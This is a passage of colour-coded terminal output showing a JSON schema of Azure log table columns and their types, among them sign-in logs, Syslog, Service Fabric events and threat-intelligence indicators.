\u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VirtualAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Workstation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkstationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ServiceFabricOperationalEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"ApplicationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PartitionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UpgradeDomains\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ServiceFabricReliableActorEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"ActorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActorIdKind\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ActorType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CountOfWaitingMethodCalls\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Exception\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsStateful\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MethodExecutionTimeTicks\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"MethodName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MethodSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NodeId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PartitionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReplicaId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"ReplicaOrInstanceId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SaveStateExecutionTimeTicks\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ServiceFabricReliableServiceEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"ActualCancellationTimeMillis\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Exception\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PartitionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReplicaId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SlowCancellationTimeMillis\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WasCanceled\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m\n    },\n    \u001b[94m\"SigninLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"AADTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientAppUsed\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConditionalAccessPolicies\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"ConditionalAccessStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceDetail\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Id\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsRisky\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LocationDetails\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OriginalRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskDetail\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskEventTypes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskLevelAggregated\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskLevelDuringSignIn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Syslog\"\u001b[39;49;00m: {\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Facility\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SeverityLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SyslogMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ThreatIntelligenceIndicator\"\u001b[39;49;00m: {\n        \u001b[94m\"Action\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Active\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityGroupNames\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConfidenceScore\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DiamondModel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailEncoding\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailLanguage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailRecipient\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSenderAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSenderName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSourceDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSourceIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSubject\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailXMailer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExpirationDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalIndicatorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileCompileDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"FileCreatedDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"FileHashType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileHashValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileMutexName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePacker\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileSize\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FileType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainActions\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainC2\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainDelivery\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainExploitation\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainReconnaissance\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainWeaponization\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KnownFalsePositives\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MalwareNames\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkCidrBlock\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationAsn\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationCidrBlock\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkProtocol\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourceAsn\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourceCidrBlock\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourceIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourcePort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"PassiveOnly\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatSeverity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TrafficLightProtocolLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Url\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Usage\"\u001b[39;49;00m: {\n        \u001b[94m\"AvgLatencyInSeconds\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"BatchesCapped\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"BatchesOutsideSla\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"BatchesWithinSla\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DataType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"IsBillable\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"LinkedMeterId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LinkedResourceUri\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MeterId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Quantity\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"QuantityUnit\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceUri\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Solution\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TotalBatches\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"W3CIISLog\"\u001b[39;49;00m: {\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Confidence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FirstReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsActive\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RoleInstance\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Severity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StorageAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TLPLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeTaken\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"cIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"csCookie\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csHost\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csReferer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUriQuery\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUriStem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"csVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"sIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"sPort\"\u001b[39;49;00m: 